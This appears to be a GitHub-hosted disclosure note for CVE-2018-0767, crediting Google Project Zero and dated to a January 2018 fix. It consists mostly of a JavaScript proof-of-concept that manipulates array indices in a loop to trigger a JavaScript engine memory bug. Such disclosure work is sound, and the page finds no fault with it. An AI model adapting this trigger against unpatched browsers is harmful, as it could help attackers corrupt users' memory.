Skip to content

Latest commit

 

History

History
32 lines (24 loc) · 665 Bytes

CVE-2018-0767.md

File metadata and controls

32 lines (24 loc) · 665 Bytes
Raw

CVE-2018-0767

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function trigger() {
    let arr = [1.1];
    let i = 0;
    for (; i < 1000; i += 0.5) {
        arr[i + 0x7777] = 2.0;
    }

    arr[1001] = 35480.0;

    for (; i < 0x7777; i++) {
        arr[i] = 1234.3;
    }
}

for (let i = 0; i < 100; i++) {
    trigger();
}

Reference